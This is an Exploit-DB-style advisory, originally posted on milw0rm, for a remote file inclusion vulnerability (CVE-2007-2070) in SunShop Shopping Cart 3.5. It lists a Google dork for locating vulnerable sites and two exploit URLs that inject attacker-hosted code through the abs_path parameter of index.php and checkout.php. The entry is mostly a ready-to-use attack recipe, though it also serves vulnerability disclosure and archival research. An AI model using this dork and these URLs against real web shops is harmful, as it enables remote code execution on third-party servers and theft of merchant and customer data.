[] NeoSense

SunShop Shopping Cart 3.5 - 'abs_path' Remote File Inclusion

Author: irvian
type: webapps
platform: php
port: 
date_added: 2007-04-15 
date_updated: 2016-12-20 
verified: 1 
codes: OSVDB-37415;CVE-2007-2070;OSVDB-37414 
tags: 
aliases:  
screenshot_url:  
application_url: 

sunshop 4 (index.php) Remote File Include Vulnerability

-----------------------------------------------------------------------------------------
# scripts       : SunShop v3.5
# Discovered By : irvian
# scripts site  : http://www.turnkeywebtools.com/sunshop/
# Thanks To     : #hitamputih #nyubicrew #patihack
# special To    : nyubi,ibnusina,arioo,jipank,kacung,trangkil,cah_gemblunkz,permenhack
# dork          : "powered by sunshop"
------------------------------------------------------------------------------------------
bug found:

Exploit: www.target.com/index.php?abs_path=[evilcode]
         www.target.com/checkout.php?abs_path=[evilcode]

# milw0rm.com [2007-04-16]